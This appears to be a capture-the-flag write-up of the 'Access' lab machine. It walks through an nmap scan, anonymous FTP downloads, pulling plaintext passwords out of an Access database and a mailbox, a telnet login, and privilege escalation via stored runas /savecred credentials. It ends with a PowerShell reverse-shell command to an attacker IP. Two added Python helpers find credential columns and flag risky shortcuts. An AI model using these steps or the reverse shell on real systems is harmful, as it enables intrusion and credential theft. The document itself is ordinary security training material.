Reconnaissance
Scan with nmap.
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  syn-ack ttl 127 Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
FTP allows anonymous login.
┌──(kali㉿kali)-[~/htb/access]
└─$ ftp
ftp> open
(to) 10.129.4.14
Connected to 10.129.4.14.
220 Microsoft FTP Service
Name (10.129.4.14:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       Backups
08-24-18  09:00PM       Engineer
226 Transfer complete.
Two directories are visible.
backup.mdb can be downloaded from Backups, and Access Control.zip from Engineer.
Switch to binary mode before downloading.
ftp> passive off
Passive mode: off; fallback to active mode: off.
ftp> binary
200 Type set to I.
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************************************************************| 10870       19.59 KiB/s    00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (19.55 KiB/s)
ftp>
Examining backup.mdb
List the tables contained in the mdb file.
┌──(kali㉿kali)-[~/htb/access]
└─$ mdb-tables backup.mdb -1
acc_antiback
acc_door
acc_firstopen
acc_firstopen_emp
acc_holidays
acc_interlock
acc_levelset
acc_levelset_door_group
---snip---
Export every table to CSV.
┌──(kali㉿kali)-[~/htb/access]
└─$ for t in $(mdb-tables -1 backup.mdb); do
mdb-export ./backup.mdb "$t" > "${t}.csv"
done
Search the CSV files for ones that look like they contain credentials.
The passwords are in auth_user.
┌──(kali㉿kali)-[~/htb/access/mdb]
└─$ grep -iE '(pass| pwd | token| secret| api| login| user)' *.csv
Machines.csv:ID,ConnectType,IP,SerialPort,Port,Baudrate,MachineNumber,IsHost,Enabled,CommPassword,UILanguage,DateFormat,InOutRecordWarn,Idle,Voice,managercount,fingercount,SecretCount,ProductType,LockControl,Purpose,ProduceKind,sn,PhotoStamp,IsIfChangeConfigServer2,pushver,change_operator,change_time,create_operator,create_time,delete_operator,delete_time,status,device_type,last_activity,trans_times,TransInterval,log_stamp,oplog_stamp,photo_stamp,UpdateDB,device_name,transaction_count,main_time,max_user_count,max_finger_count,max_attlog_count,alg_ver,flash_size,free_flash_size,language,lng_encode,volume,is_tft,platform,brightness,oem_vendor,city,AccFun,TZAdj,comm_type,agent_ipaddress,subnet_mask,gateway,area_id,acpanel_type,sync_time,four_to_two,video_login,fp_mthreshold,Fpversion,max_comm_size,max_comm_count,realtime,delay,encrypt,dstime_id,door_count,reader_count,aux_in_count,aux_out_count,IsOnlyRFMachine,alias,ipaddress,com_port,com_address,DeviceNetmask,DeviceGetway,SimpleEventType,FvFunOn,fvcount,deviceOption,DevSDKType,UTableDesc,IsTFTMachine,PinWidth,UserExtFmt,FP1_NThreshold,FP1_1Threshold,Face1_NThreshold,Face1_1Threshold,Only1_1Mode,OnlyCheckCard,MifireMustRegistered,RFCardOn,Mifire,MifireId,NetOn,RS232On,RS485On,FreeType,FreeTime,NoDisplayFun,VoiceTipsOn,TOMenu,StdVolume,VRYVH,KeyPadBeep,BatchUpdate,CardFun,FaceFunOn,FaceCount,TimeAPBFunOn,FirmwareVersion,FingerFunOn,CompatOldFirmware,ParamValues,WirelessSSID,WirelessKey,WirelessAddr,WirelessMask,WirelessGateWay,IsWireless,ACFun,BiometricType,BiometricVersion,BiometricMaxCount,BiometricUsedCount,WIFI,WIFIOn,WIFIDHCP,MachineAlias,usercount
USERINFO.csv:USERID,Badgenumber,SSN,Gender,TITLE,PAGER,BIRTHDAY,HIREDDAY,street,CITY,STATE,ZIP,OPHONE,FPHONE,VERIFICATIONMETHOD,DEFAULTDEPTID,SECURITYFLAGS,ATT,INLATE,OUTEARLY,OVERTIME,SEP,HOLIDAY,MINZU,PASSWORD,LUNCHDURATION,PHOTO,mverifypass,Notes,privilege,InheritDeptSch,InheritDeptSchClass,AutoSchPlan,MinAutoSchInterval,RegisterOT,InheritDeptRule,EMPRIVILEGE,CardNo,change_operator,change_time,create_operator,create_time,delete_operator,delete_time,status,lastname,AccGroup,TimeZones,identitycard,UTime,Education,OffDuty,DelTag,morecard_group_id,set_valid_time,acc_startdate,acc_enddate,birthplace,Political,contry,hiretype,email,firedate,isatt,homeaddress,emptype,bankcode1,bankcode2,isblacklist,Iuser1,Iuser2,Iuser3,Iuser4,Iuser5,Cuser1,Cuser2,Cuser3,Cuser4,Cuser5,Duser1,Duser2,Duser3,Duser4,Duser5,reserve,name,OfflineBeginDate,OfflineEndDate,carNo,carType,carBrand,carColor
auth_user.csv:id,username,password,Status,last_login,RoleID,Remark
export_table.csv:acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
┌──(kali㉿kali)-[~/htb/access/mdb]
└─$ cat auth_user.csv
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
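As an added example (mine, not part of the original writeup), a column-aware pass over the exported CSVs that does what the grep above does by header name rather than by raw line, and additionally flags accounts whose password equals their username, as admin and backup_admin do here. The sample data is constructed in the layout of the page's auth_user.csv export; the acc_door rows are made up.

```python
import csv
import io
import re

# Column names that usually hold secrets in an exported access-control DB
CRED_COLUMN = re.compile(r"pass|pwd|token|secret|api|key", re.IGNORECASE)


def find_credentials(tables: dict) -> list:
    """tables maps table name -> CSV text as written by mdb-export.
    Returns (table, column, username, value, note) for every populated
    credential-looking column; note is set when password == username."""
    hits = []
    for table, text in tables.items():
        reader = csv.DictReader(io.StringIO(text))
        cred_cols = [c for c in reader.fieldnames or [] if CRED_COLUMN.search(c)]
        if not cred_cols:
            continue                     # nothing secret-shaped in this table
        for row in reader:
            user = row.get("username") or row.get("USERID") or ""
            for col in cred_cols:
                value = row.get(col) or ""
                if not value:
                    continue
                note = "password equals username" if value == user else ""
                hits.append((table, col, user, value, note))
    return hits


# Constructed sample: first table mirrors the page's auth_user.csv layout,
# second is a made-up table with no credential columns.
SAMPLE = {
    "auth_user": (
        "id,username,password,Status,last_login,RoleID,Remark\n"
        '25,"admin","admin",1,"08/23/18 21:11:47",26,\n'
        '27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,\n'
    ),
    "acc_door": 'id,door_name,lock_delay\n1,"Front",5\n',
}

if __name__ == "__main__":
    for hit in find_credentials(SAMPLE):
        print(hit)
```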
Examining Access Control.zip
Extract the zip file using the password recovered above.
7z x Access\ Control.zip
It contains Access Control.pst, and the pst file holds the credentials for the security account.
┌──(kali㉿kali)-[~/htb/access]
└─$ readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
┌──(kali㉿kali)-[~/htb/access]
└─$ ls
'Access Control.mbox' 'Access Control.pst' 'Access Control.zip' backup.mdb mdb nmap.txt reports rustscan.txt udpnmap-p.txt
┌──(kali㉿kali)-[~/htb/access]
└─$ cat Access\ Control.mbox
From "john@megacorp.com" Fri Aug 24 08:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1378250037_-_-"
----boundary-LibPST-iamunique-1378250037_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1378250037_-_-"
--alt---boundary-LibPST-iamunique-1378250037_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
Getting user.txt
Logging in over telnet with the security credentials gives access to user.txt.
┌──(kali㉿kali)-[~/htb/access]
└─$ telnet 10.129.4.14
Trying 10.129.4.14...
Connected to 10.129.4.14.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
Privilege escalation
C:\Users\Public\Desktop contains ZKAccess3.5 Security System.lnk.
The string Administrator can be seen inside it.
C:\Users\Public\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Public\Desktop
08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
1 File(s) 1,870 bytes
0 Dir(s) 3,350,327,296 bytes free
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
[binary shortcut data; only the readable strings are shown]
C:\  Windows  System32  runas.exe
C:\Windows\System32\runas.exe
..\..\..\Windows\System32\runas.exe
C:\ZKTeco\ZKAccess3.5
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
access
S-1-5-21-953262931-566350628-63446256-500
C:\Users\Public\Desktop>
Searching for "runas savecred" turns up the following information.
runas normally prompts for a password when it is run, but with the /savecred option it uses the password stored in Credential Manager and runs the command without prompting.
Running cmdkey /list confirms that credentials for Administrator are indeed stored.
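Reading the shortcut with type dumps binary to the console. The added example below (mine, not from the writeup) parses the MS-SHLLINK format directly to recover the shortcut's target path and command-line arguments, and flags shortcuts that launch runas.exe with /savecred, which is what a defender sweeping Public Desktop for the pattern described above would want. The build_sample_lnk helper constructs a test shortcut in memory from the strings seen on this page; the real .lnk file is not included, and the volume serial is the one from the dir listing.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon", HAS_ICON))


def parse_lnk(data: bytes) -> dict:
    """Return the LocalBasePath target and StringData fields of a shortcut."""
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, out = 76, {"target": None}               # ShellLinkHeader is 76 bytes
    if flags & HAS_IDLIST:                        # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        size, _, li_flags, _, base = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + base)
            out["target"] = data[pos + base:end].decode("cp1252")
        pos += size
    width = 2 if flags & IS_UNICODE else 1
    for name, bit in STRING_FIELDS:               # CountCharacters + chars
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + n * width]
            out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + n * width
    return out


def uses_savecred(info: dict) -> bool:
    """True when the shortcut launches runas.exe with /savecred."""
    target = (info.get("target") or "").lower()
    args = (info.get("arguments") or "").lower()
    return target.endswith("runas.exe") and "/savecred" in args


def build_sample_lnk(target: str, args: str) -> bytes:
    """Constructed shortcut for offline testing (not the file from the box)."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, clsid,
                         HAS_LINKINFO | HAS_ARGS | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    path = target.encode("cp1252") + b"\x00"
    volume = struct.pack("<IIII", 17, 3, 0x8164DB5F, 16) + b"\x00"  # 17 bytes
    size = 28 + len(volume) + len(path) + 1
    link_info = struct.pack("<IIIIIII", size, 28, 1, 28, 28 + len(volume),
                            0, size - 1) + volume + path + b"\x00"
    return header + link_info + struct.pack("<H", len(args)) + args.encode("utf-16-le")
```

On a live host the same parse_lnk runs over every .lnk under C:\Users\Public\Desktop and the Start Menu folders; ExtraData blocks after StringData are ignored, which is fine for this check.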
Appending the following line to the end of Invoke-PowerShellTCP.ps1 and running it gives a reverse shell.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.223 -Port 1234
